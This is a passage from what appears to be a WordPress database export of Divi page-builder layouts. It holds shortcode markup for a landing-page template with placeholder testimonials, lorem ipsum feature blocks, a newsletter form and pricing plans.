parallax_method_4=\"off\" gutter_width=\"2\" custom_padding_phone=\"0px||50px|\" background_color_1=\"#ffffff\" background_color_2=\"#ffffff\" background_color_3=\"#ede7f6\" custom_css_main_1=\"border-radius: 4px;||box-shadow: 2px 2px 2px #D2D0CB;\" custom_css_main_2=\"border-radius: 4px;||box-shadow: 2px 2px 2px #D2D0CB;\" custom_css_main_3=\"border-radius: 4px;\" custom_padding_tablet=\"40px||119px|\"][et_pb_column type=\"1_2\"][et_pb_image admin_label=\"Image\" src=\"https://companyregistration.online/wp-content/uploads/2016/08/18.png\" show_in_lightbox=\"off\" url_new_window=\"off\" use_overlay=\"off\" animation=\"bottom\" sticky=\"off\" align=\"center\" max_width=\"80px\" force_fullwidth=\"off\" always_center_on_mobile=\"on\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin=\"54px||38px|\" custom_margin_last_edited=\"on|desktop\" custom_margin_phone=\"40px|||\" custom_margin_tablet=\"50px|||\"]\n\n\n\n[/et_pb_image][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"center\" text_font=\"Roboto Light||||\" text_font_size=\"24\" text_text_color=\"#303030\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin=\"0px||28px|\" custom_css_main_element=\"font-weight:300;\" text_line_height=\"1.5em\" max_width=\"78%\" custom_margin_last_edited=\"on|desktop\"]\n\n<p>\"I love Divi. I don\'t know what else to say. I couldn\'t have asked for more than this.\"</p>\n\n[/et_pb_text][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"center\" text_font=\"Roboto||||\" text_font_size=\"18\" text_text_color=\"#303030\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin=\"0px||0px|\" custom_css_main_element=\"font-weight:400;\" text_line_height=\"1.5em\"]\n\n<p>Member name</p>\n\n[/et_pb_text][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"center\" text_font=\"Roboto Light||||\" text_font_size=\"16\" text_text_color=\"#303030\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin=\"0px||62px|\" custom_css_main_element=\"font-weight:300;\" text_line_height=\"1.5em\"]\n\n<p>Country</p>\n\n[/et_pb_text][/et_pb_column][et_pb_column type=\"1_2\"][et_pb_image admin_label=\"Image\" src=\"https://companyregistration.online/wp-content/uploads/2016/08/19.png\" show_in_lightbox=\"off\" url_new_window=\"off\" use_overlay=\"off\" animation=\"bottom\" sticky=\"off\" align=\"center\" max_width=\"80px\" force_fullwidth=\"off\" always_center_on_mobile=\"on\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin=\"54px||38px|\" custom_margin_last_edited=\"on|phone\" custom_margin_phone=\"40px|||\" custom_margin_tablet=\"50px|||\"]\n\n\n\n[/et_pb_image][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"center\" text_font=\"Roboto Light||||\" text_font_size=\"24\" text_text_color=\"#303030\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin=\"0px||28px|\" custom_css_main_element=\"font-weight:300;\" text_line_height=\"1.5em\" max_width=\"78%\" custom_margin_last_edited=\"on|desktop\"]\n\n<p>\"Divi is worth much more than I paid. I don\'t always clop, but when I do, it\'s because of Divi.\"</p>\n\n[/et_pb_text][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"center\" text_font=\"Roboto||||\" text_font_size=\"18\" text_text_color=\"#303030\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin=\"0px||0px|\" custom_css_main_element=\"font-weight:400;\" text_line_height=\"1.5em\"]\n\n<p>Member name</p>\n\n[/et_pb_text][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"center\" text_font=\"Roboto Light||||\" text_font_size=\"16\" text_text_color=\"#303030\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin=\"0px||62px|\" custom_css_main_element=\"font-weight:300;\" text_line_height=\"1.5em\"]\n\n<p>Country</p>\n\n[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section]','#3 Landing Page','','publish','closed','closed','','3-landing-page','','','2016-08-02 00:08:47','2016-08-01 22:08:47','',0,'https://companyregistration.online/et_pb_layout/3-landing-page/',0,'et_pb_layout','',0),(27814,1,'2016-08-19 02:18:28','2016-08-19 00:18:28','[et_pb_section admin_label=\"#1\" transparent_background=\"off\" background_color=\"#ede7f6\" allow_player_pause=\"off\" inner_shadow=\"off\" parallax=\"off\" parallax_method=\"off\" padding_mobile=\"off\" make_fullwidth=\"off\" use_custom_width=\"off\" width_unit=\"on\" make_equal=\"off\" use_custom_gutter=\"off\" collapsed=\"off\" custom_css_main_element=\"border-top: 1px solid #7E57C2;\" background_image=\"https://companyregistration.online/wp-content/uploads/2016/08/092.jpg\"][et_pb_row admin_label=\"row\" make_fullwidth=\"off\" use_custom_width=\"off\" width_unit=\"on\" use_custom_gutter=\"off\" custom_padding=\"||0px|\" padding_mobile=\"on\" custom_margin=\"8%||10%|\" allow_player_pause=\"off\" parallax=\"off\" parallax_method=\"off\" make_equal=\"off\" parallax_1=\"off\" parallax_method_1=\"off\" parallax_2=\"off\" parallax_method_2=\"off\" column_padding_mobile=\"on\"][et_pb_column type=\"2_3\"][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"left\" text_font=\"Roboto Light||||\" text_font_size=\"24\" text_text_color=\"#ffffff\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin=\"||0px|\" custom_css_main_element=\"font-weight:300;\"]\n\n<p>Wireframe Kit Vol. 02</p>\n\n[/et_pb_text][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"left\" text_font=\"Roboto Light||||\" text_font_size=\"64\" text_text_color=\"#ffffff\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin=\"24px||0px|\" custom_css_main_element=\"font-weight:300;\" text_line_height=\"1.1em\" max_width=\"98%\" text_font_size_last_edited=\"on|tablet\" text_font_size_phone=\"36\"]\n\n<p>Create a beautiful landing page.</p>\n\n[/et_pb_text][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"left\" text_font=\"Roboto||||on\" text_font_size=\"16\" text_text_color=\"#ffffff\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin=\"48px|||\" text_line_height=\"1.1em\" text_letter_spacing=\"1px\" text_font_size_last_edited=\"on|phone\" text_font_size_phone=\"12\" custom_margin_last_edited=\"on|phone\" custom_margin_phone=\"48px||50px|\"]\n\n<p>LEARN MORE</p>\n\n[/et_pb_text][/et_pb_column][et_pb_column type=\"1_3\"][et_pb_contact_form admin_label=\"Temporary form (e.g. Newsletter)\" captcha=\"off\" use_redirect=\"off\" form_background_color=\"#ffffff\" input_border_radius=\"4\" title_font=\"Roboto||||\" title_font_size=\"18\" title_text_color=\"#3e51b5\" form_field_font=\"Roboto||||\" form_field_font_size=\"18\" form_field_text_color=\"#303030\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_button=\"on\" button_text_size=\"14\" button_text_color=\"#ffffff\" button_bg_color=\"#3e51b5\" button_border_width=\"4\" button_border_color=\"#3e51b5\" button_border_radius=\"4\" button_letter_spacing=\"1\" button_font=\"Roboto|||on|\" button_use_icon=\"default\" button_icon_placement=\"right\" button_on_hover=\"on\" button_text_color_hover=\"#ffffff\" button_bg_color_hover=\"#3e51b5\" button_border_color_hover=\"#3e51b5\" button_border_radius_hover=\"4\" button_letter_spacing_hover=\"1\" custom_css_contact_button=\"height:60px;||margin-top:8px;\" custom_css_contact_fields=\"height:60px;||\" custom_css_main_element=\"width:100%;||\"]\n\n[et_pb_contact_field field_title=\"Name\" field_type=\"input\" field_id=\"Name\" required_mark=\"on\" fullwidth_field=\"on\" input_border_radius=\"0\" form_field_font_select=\"default\" form_field_font=\"||||\" use_border_color=\"off\" border_style=\"solid\"]\n[/et_pb_contact_field][et_pb_contact_field field_title=\"Last Name\" field_type=\"input\" field_id=\"Last Name\" required_mark=\"on\" fullwidth_field=\"on\" input_border_radius=\"0\" form_field_font_select=\"default\" form_field_font=\"||||\" use_border_color=\"off\" border_style=\"solid\"]\n[/et_pb_contact_field][et_pb_contact_field field_title=\"Email\" field_type=\"input\" field_id=\"Email\" required_mark=\"on\" fullwidth_field=\"on\" input_border_radius=\"0\" form_field_font_select=\"default\" form_field_font=\"||||\" use_border_color=\"off\" border_style=\"solid\"]\n[/et_pb_contact_field]\n\n[/et_pb_contact_form][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section admin_label=\"#2\" fullwidth=\"off\" specialty=\"off\" transparent_background=\"off\" background_color=\"#ffffff\" allow_player_pause=\"off\" inner_shadow=\"off\" parallax=\"off\" parallax_method=\"off\" padding_mobile=\"off\" make_fullwidth=\"off\" use_custom_width=\"off\" width_unit=\"on\" make_equal=\"off\" use_custom_gutter=\"off\" collapsed=\"off\"][et_pb_row admin_label=\"Row\" make_fullwidth=\"off\" use_custom_width=\"on\" width_unit=\"on\" use_custom_gutter=\"off\" custom_padding=\"119px|||\" padding_mobile=\"on\" allow_player_pause=\"off\" parallax=\"off\" parallax_method=\"off\" make_equal=\"off\" parallax_1=\"off\" parallax_method_1=\"off\" parallax_2=\"off\" parallax_method_2=\"off\" column_padding_mobile=\"on\" custom_width_px=\"550px\" custom_padding_phone=\"41px|||\" custom_padding_last_edited=\"on|desktop\"][et_pb_column type=\"4_4\"][et_pb_divider admin_label=\"Divider Desktop\" color=\"#d4d4d4\" show_divider=\"on\" divider_style=\"solid\" divider_position=\"center\" divider_weight=\"2\" hide_on_mobile=\"off\" custom_css_main_element=\"width:50px;||margin-left: 47%;||margin-right: 47%;||\" height=\"19\" disabled=\"off\" disabled_on=\"on|on|\"]\n\n\n\n[/et_pb_divider][et_pb_divider admin_label=\"Divider Mobile\" color=\"#d4d4d4\" show_divider=\"on\" divider_style=\"solid\" divider_position=\"center\" divider_weight=\"2\" hide_on_mobile=\"off\" custom_css_main_element=\"width:50px;||margin-left: 44%;||margin-right: 44%;||\" height=\"19\" disabled=\"off\" disabled_on=\"||on\"]\n\n\n\n[/et_pb_divider][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"center\" text_font=\"Roboto Light||||\" text_font_size=\"52\" text_text_color=\"#303030\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin=\"24px||0px|\" custom_css_main_element=\"font-weight:300;\" text_line_height=\"1.1em\" max_width=\"80%\" text_font_size_last_edited=\"on|phone\" text_font_size_phone=\"30\" text_font_size_tablet=\"46\"]\n\n<p>Set your<br>\nDivi website apart.</p>\n\n[/et_pb_text][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"center\" text_font=\"Roboto Light||||\" text_font_size=\"20\" text_text_color=\"#303030\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin=\"18px||0px|\" custom_css_main_element=\"font-weight:300;\" max_width=\"540px\" text_line_height=\"1.5em\"]\n\n<p>I’m a lorem ipsum paragraph. Phasellus ac magna non augue porttitor scelerisque ac id diam. Mauris elit velit, lobortis sed interdum at, vestibulum vitae libero.</p>\n\n[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row admin_label=\"Row\" make_fullwidth=\"off\" use_custom_width=\"off\" width_unit=\"on\" use_custom_gutter=\"off\" custom_padding=\"55px||20px|\" custom_padding_last_edited=\"on|desktop\" padding_mobile=\"on\" allow_player_pause=\"off\" parallax=\"off\" parallax_method=\"off\" make_equal=\"off\" parallax_1=\"off\" parallax_method_1=\"off\" parallax_2=\"off\" parallax_method_2=\"off\" column_padding_mobile=\"on\" custom_padding_phone=\"7px||0px|\"][et_pb_column type=\"4_4\"][et_pb_image admin_label=\"Image\" src=\"https://companyregistration.online/wp-content/uploads/2016/08/131.png\" show_in_lightbox=\"off\" url_new_window=\"off\" use_overlay=\"off\" animation=\"off\" sticky=\"off\" align=\"left\" force_fullwidth=\"off\" always_center_on_mobile=\"on\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\"]\n\n\n\n[/et_pb_image][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section admin_label=\"#3\" fullwidth=\"off\" specialty=\"off\" collapsed=\"off\" transparent_background=\"off\" background_color=\"#ffffff\" allow_player_pause=\"off\" inner_shadow=\"off\" parallax=\"off\" parallax_method=\"off\" padding_mobile=\"off\" make_fullwidth=\"off\" use_custom_width=\"off\" width_unit=\"on\" make_equal=\"off\" use_custom_gutter=\"off\"][et_pb_row admin_label=\"Row\" make_fullwidth=\"off\" use_custom_width=\"on\" width_unit=\"on\" use_custom_gutter=\"off\" custom_padding=\"41px|||\" padding_mobile=\"on\" allow_player_pause=\"off\" parallax=\"off\" parallax_method=\"off\" make_equal=\"off\" parallax_1=\"off\" parallax_method_1=\"off\" parallax_2=\"off\" parallax_method_2=\"off\" column_padding_mobile=\"on\" custom_width_px=\"540px\" custom_padding_phone=\"0px|||\" custom_padding_last_edited=\"on|phone\" custom_padding_tablet=\"49px|||\"][et_pb_column type=\"4_4\"][et_pb_divider admin_label=\"Divider Desktop\" color=\"#d4d4d4\" show_divider=\"on\" divider_style=\"solid\" divider_position=\"center\" divider_weight=\"2\" hide_on_mobile=\"off\" custom_css_main_element=\"width:50px;||margin-left: 47%;||margin-right: 47%;||\" height=\"19\" disabled=\"off\" disabled_on=\"on|on|\"]\n\n\n\n[/et_pb_divider][et_pb_divider admin_label=\"Divider Mobile\" color=\"#d4d4d4\" show_divider=\"on\" divider_style=\"solid\" divider_position=\"center\" divider_weight=\"2\" hide_on_mobile=\"off\" custom_css_main_element=\"width:50px;||margin-left: 44%;||margin-right: 44%;||\" height=\"19\" disabled=\"off\" disabled_on=\"||on\"]\n\n\n\n[/et_pb_divider][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"center\" text_font=\"Roboto Light||||\" text_font_size=\"52\" text_text_color=\"#303030\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin=\"24px||0px|\" custom_css_main_element=\"font-weight:300;\" text_line_height=\"1.1em\" max_width=\"80%\" text_font_size_last_edited=\"on|phone\" text_font_size_phone=\"30\" text_font_size_tablet=\"46\"]\n\n<p>Built to influence.</p>\n\n[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row admin_label=\"Row\" make_fullwidth=\"off\" use_custom_width=\"off\" width_unit=\"on\" use_custom_gutter=\"off\" custom_padding=\"77px||0px|\" custom_padding_last_edited=\"on|phone\" padding_mobile=\"on\" allow_player_pause=\"off\" parallax=\"off\" parallax_method=\"off\" make_equal=\"off\" parallax_1=\"off\" parallax_method_1=\"off\" parallax_2=\"off\" parallax_method_2=\"off\" column_padding_mobile=\"on\" custom_padding_phone=\"7px||0px|\" parallax_3=\"off\" parallax_method_3=\"off\"][et_pb_column type=\"1_3\"][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"left\" text_font=\"Roboto||||\" text_font_size=\"24\" text_text_color=\"#303030\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin=\"||0px|\" custom_css_main_element=\"font-weight:400;\" text_line_height=\"1.5em\"]\n\n<span><img style=\"float:left\" src=\"https://companyregistration.online/wp-content/uploads/2016/08/14.png\" alt=\"14\" width=\"31\" height=\"31\" class=\"alignnone size-full wp-image-27599\"> </span> <span style=\"margin-top:-10px;margin-left:14px\">Designed</span>\n\n[/et_pb_text][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"left\" text_font=\"Roboto Light||||\" text_font_size=\"18\" text_text_color=\"#303030\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin=\"19px||0px|\" custom_css_main_element=\"font-weight:300;\" text_line_height=\"1.5em\"]\n\n<p>Curabitur non nisi nec velit at tempor vulputate ac ut odio. Cras nec augue sit amet orci condimentum cursus tempus.</p>\n\n[/et_pb_text][/et_pb_column][et_pb_column type=\"1_3\"][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"left\" text_font=\"Roboto||||\" text_font_size=\"24\" text_text_color=\"#303030\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin=\"||0px|\" custom_css_main_element=\"font-weight:400;\" text_line_height=\"1.5em\"]\n\n<span><img style=\"float:left\" src=\"https://companyregistration.online/wp-content/uploads/2016/08/14.png\" alt=\"14\" width=\"31\" height=\"31\" class=\"alignnone size-full wp-image-27599\"> </span> <span style=\"margin-top:-10px;margin-left:14px\">Custom CSS</span>\n\n[/et_pb_text][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"left\" text_font=\"Roboto Light||||\" text_font_size=\"18\" text_text_color=\"#303030\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin=\"19px||0px|\" custom_css_main_element=\"font-weight:300;\" text_line_height=\"1.5em\"]\n\n<p>Curabitur non nisi nec velit at tempor vulputate ac ut odio. Cras nec augue sit amet orci condimentum cursus tempus.</p>\n\n[/et_pb_text][/et_pb_column][et_pb_column type=\"1_3\"][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"left\" text_font=\"Roboto||||\" text_font_size=\"24\" text_text_color=\"#303030\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin=\"||0px|\" custom_css_main_element=\"font-weight:400;\" text_line_height=\"1.5em\"]\n\n<span><img style=\"float:left\" src=\"https://companyregistration.online/wp-content/uploads/2016/08/14.png\" alt=\"14\" width=\"31\" height=\"31\" class=\"alignnone size-full wp-image-27599\"> </span> <span style=\"margin-top:-10px;margin-left:14px\">Free Google Fonts</span>\n\n[/et_pb_text][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"left\" text_font=\"Roboto Light||||\" text_font_size=\"18\" text_text_color=\"#303030\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin=\"19px||0px|\" custom_css_main_element=\"font-weight:300;\" text_line_height=\"1.5em\"]\n\n<p>Curabitur non nisi nec velit at tempor vulputate ac ut odio. Cras nec augue sit amet orci condimentum cursus tempus.</p>\n\n[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row admin_label=\"Row\" make_fullwidth=\"off\" use_custom_width=\"off\" width_unit=\"on\" use_custom_gutter=\"off\" custom_padding=\"68px||121px|\" custom_padding_last_edited=\"on|phone\" padding_mobile=\"on\" allow_player_pause=\"off\" parallax=\"off\" parallax_method=\"off\" make_equal=\"off\" parallax_1=\"off\" parallax_method_1=\"off\" parallax_2=\"off\" parallax_method_2=\"off\" column_padding_mobile=\"on\" custom_padding_phone=\"7px||46px|\" parallax_3=\"off\" parallax_method_3=\"off\"][et_pb_column type=\"1_3\"][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"left\" text_font=\"Roboto||||\" text_font_size=\"24\" text_text_color=\"#303030\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin=\"||0px|\" custom_css_main_element=\"font-weight:400;\" text_line_height=\"1.5em\"]\n\n<span><img style=\"float:left\" src=\"https://companyregistration.online/wp-content/uploads/2016/08/14.png\" alt=\"14\" width=\"31\" height=\"31\" class=\"alignnone size-full wp-image-27599\"> </span> <span style=\"margin-top:-10px;margin-left:14px\">Direct Editing</span>\n\n[/et_pb_text][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"left\" text_font=\"Roboto Light||||\" text_font_size=\"18\" text_text_color=\"#303030\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin=\"19px||0px|\" custom_css_main_element=\"font-weight:300;\" text_line_height=\"1.5em\"]\n\n<p>Curabitur non nisi nec velit at tempor vulputate ac ut odio. Cras nec augue sit amet orci condimentum cursus tempus.</p>\n\n[/et_pb_text][/et_pb_column][et_pb_column type=\"1_3\"][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"left\" text_font=\"Roboto||||\" text_font_size=\"24\" text_text_color=\"#303030\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin=\"||0px|\" custom_css_main_element=\"font-weight:400;\" text_line_height=\"1.5em\"]\n\n<span><img style=\"float:left\" src=\"https://companyregistration.online/wp-content/uploads/2016/08/14.png\" alt=\"14\" width=\"31\" height=\"31\" class=\"alignnone size-full wp-image-27599\"> </span> <span style=\"margin-top:-10px;margin-left:14px\">Multiple Access Leveles</span>\n\n[/et_pb_text][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"left\" text_font=\"Roboto Light||||\" text_font_size=\"18\" text_text_color=\"#303030\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin=\"19px||0px|\" custom_css_main_element=\"font-weight:300;\" text_line_height=\"1.5em\"]\n\n<p>Curabitur non nisi nec velit at tempor vulputate ac ut odio. Cras nec augue sit amet orci condimentum cursus tempus.</p>\n\n[/et_pb_text][/et_pb_column][et_pb_column type=\"1_3\"][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"left\" text_font=\"Roboto||||\" text_font_size=\"24\" text_text_color=\"#303030\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin=\"||0px|\" custom_css_main_element=\"font-weight:400;\" text_line_height=\"1.5em\"]\n\n<span><img style=\"float:left\" src=\"https://companyregistration.online/wp-content/uploads/2016/08/14.png\" alt=\"14\" width=\"31\" height=\"31\" class=\"alignnone size-full wp-image-27599\"> </span> <span style=\"margin-top:-10px;margin-left:14px\">Workflow</span>\n\n[/et_pb_text][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"left\" text_font=\"Roboto Light||||\" text_font_size=\"18\" text_text_color=\"#303030\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin=\"19px||0px|\" custom_css_main_element=\"font-weight:300;\" text_line_height=\"1.5em\"]\n\n<p>Curabitur non nisi nec velit at tempor vulputate ac ut odio. Cras nec augue sit amet orci condimentum cursus tempus.</p>\n\n[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section admin_label=\"#4\" fullwidth=\"off\" specialty=\"off\" collapsed=\"off\" transparent_background=\"off\" background_color=\"#3e51b5\" allow_player_pause=\"off\" inner_shadow=\"off\" parallax=\"off\" parallax_method=\"off\" padding_mobile=\"off\" make_fullwidth=\"off\" use_custom_width=\"off\" width_unit=\"on\" make_equal=\"off\" use_custom_gutter=\"off\"][et_pb_row admin_label=\"Row\" make_fullwidth=\"off\" use_custom_width=\"on\" width_unit=\"on\" use_custom_gutter=\"off\" custom_padding=\"119px|||\" padding_mobile=\"on\" allow_player_pause=\"off\" parallax=\"off\" parallax_method=\"off\" make_equal=\"off\" parallax_1=\"off\" parallax_method_1=\"off\" parallax_2=\"off\" parallax_method_2=\"off\" column_padding_mobile=\"on\" custom_width_px=\"540px\" custom_padding_last_edited=\"on|phone\" custom_padding_phone=\"47px|||\"][et_pb_column type=\"4_4\"][et_pb_divider admin_label=\"Divider Desktop\" color=\"#6271c2\" show_divider=\"on\" divider_style=\"solid\" divider_position=\"center\" divider_weight=\"2\" hide_on_mobile=\"off\" custom_css_main_element=\"width:50px;||margin-left: 47%;||margin-right: 47%;||\" height=\"19\" disabled=\"off\" disabled_on=\"on|on|\"]\n\n\n\n[/et_pb_divider][et_pb_divider admin_label=\"Divider Mobile\" color=\"#6271c2\" show_divider=\"on\" divider_style=\"solid\" divider_position=\"center\" divider_weight=\"2\" hide_on_mobile=\"off\" custom_css_main_element=\"width:50px;||margin-left: 44%;||margin-right: 44%;||\" height=\"19\" disabled=\"off\" disabled_on=\"||on\"]\n\n\n\n[/et_pb_divider][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"center\" text_font=\"Roboto Light||||\" text_font_size=\"52\" text_text_color=\"#ffffff\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin=\"24px||0px|\" custom_css_main_element=\"font-weight:300;\" text_line_height=\"1.1em\" max_width=\"80%\" text_font_size_last_edited=\"on|phone\" text_font_size_phone=\"30\" text_font_size_tablet=\"46\"]\n\n<p>Simple pricing.</p>\n\n[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row admin_label=\"Row\" make_fullwidth=\"off\" use_custom_width=\"off\" width_unit=\"on\" use_custom_gutter=\"on\" custom_padding=\"67px||87px|\" custom_padding_last_edited=\"on|phone\" padding_mobile=\"on\" allow_player_pause=\"off\" parallax=\"off\" parallax_method=\"off\" make_equal=\"off\" parallax_1=\"off\" parallax_method_1=\"off\" parallax_2=\"off\" parallax_method_2=\"off\" column_padding_mobile=\"on\" custom_padding_phone=\"7px||52px|\" parallax_3=\"off\" parallax_method_3=\"off\" parallax_4=\"off\" parallax_method_4=\"off\" custom_padding_tablet=\"37px||87px|\" background_color_2=\"#ffffff\"][et_pb_column type=\"1_3\"][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"center\" text_font=\"Roboto||||\" text_font_size=\"24\" text_text_color=\"#ffffff\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin=\"46px||19px|\" custom_css_main_element=\"font-weight:400;\" text_line_height=\"1.5em\"]\n\n<p>Starter Plan</p>\n\n[/et_pb_text][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"center\" text_font=\"Roboto Light||||\" text_font_size=\"82\" text_text_color=\"#ffffff\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin=\"0px||10px|\" custom_css_main_element=\"font-weight:300;\" text_line_height=\"1.1em\"]\n\n<p>$8</p>\n\n[/et_pb_text][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"center\" text_font=\"Roboto Light||||\" text_font_size=\"16\" text_text_color=\"#ffffff\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin=\"0px||53px|\" custom_css_main_element=\"font-weight:300;\" text_line_height=\"1.1em\"]\n\n<p class=\"p1\"><span class=\"s1\">Per user/ month.</span></p>\n\n[/et_pb_text][et_pb_divider admin_label=\"Divider\" color=\"#5162bc\" show_divider=\"on\" divider_style=\"solid\" divider_position=\"top\" hide_on_mobile=\"off\" height=\"1px\"]\n\n\n\n[/et_pb_divider][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"center\" text_font=\"Roboto||||\" text_font_size=\"18\" text_text_color=\"#ffffff\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin=\"51px||0px|\" custom_css_main_element=\"font-weight:500;\" text_line_height=\"1.1em\"]\n\n<p><strong>1,000 messages</strong></p>\n\n[/et_pb_text][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"center\" text_font=\"Roboto||||\" text_font_size=\"18\" text_text_color=\"#ffffff\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin=\"18px||0px|\" custom_css_main_element=\"font-weight:300;\" text_line_height=\"1.1em\"]\n\n<p><em>unlimited data</em></p>\n\n[/et_pb_text][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"center\" text_font=\"Roboto||||\" text_font_size=\"18\" text_text_color=\"#ffffff\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin=\"13px||0px|\" custom_css_main_element=\"font-weight:300;\" text_line_height=\"1.1em\"]\n\n<p><em>unlimited users</em></p>\n\n[/et_pb_text][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"center\" text_font=\"Roboto||||\" text_font_size=\"18\" text_text_color=\"#ffffff\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin=\"13px||47px|\" custom_css_main_element=\"font-weight:300;\" text_line_height=\"1.1em\"]\n\n<p><em>first 7 days free</em></p>\n\n[/et_pb_text][et_pb_button admin_label=\"Button\" button_url=\"#\" url_new_window=\"off\" button_text=\"BUTTON\" button_alignment=\"center\" background_layout=\"light\" custom_button=\"on\" button_text_size=\"13\" button_text_color=\"#ffffff\" button_bg_color=\"rgba(255,255,255,0.1)\" button_border_width=\"0\" button_border_color=\"rgba(255,255,255,0.5)\" button_border_radius=\"4\" button_letter_spacing=\"1\" button_font=\"Roboto||||\" button_use_icon=\"default\" button_icon_placement=\"right\" button_on_hover=\"on\" button_text_color_hover=\"#303030\" button_bg_color_hover=\"#ffffff\" button_border_color_hover=\"#ffffff\" button_border_radius_hover=\"4\" button_letter_spacing_hover=\"1\" custom_css_before=\"display: none !important;\" custom_css_main_element=\"padding-top: 15px !important;||padding-right: 38px !important;||padding-bottom: 14px !important;||padding-left: 38px !important;||||font-weight:700;||||\"]\n\n\n\n[/et_pb_button][et_pb_divider admin_label=\"Divider\" color=\"#cbbce7\" show_divider=\"off\" divider_style=\"solid\" divider_position=\"top\" hide_on_mobile=\"off\" height=\"30px\"]\n\n\n\n[/et_pb_divider][/et_pb_column][et_pb_column type=\"1_3\"][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"center\" text_font=\"Roboto||||\" text_font_size=\"24\" text_text_color=\"#303030\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin=\"46px||19px|\" custom_css_main_element=\"font-weight:400;\" text_line_height=\"1.5em\"]\n\n<p>Business Plan</p>\n\n[/et_pb_text][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"center\" text_font=\"Roboto Light||||\" text_font_size=\"82\" text_text_color=\"#303030\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin=\"0px||10px|\" 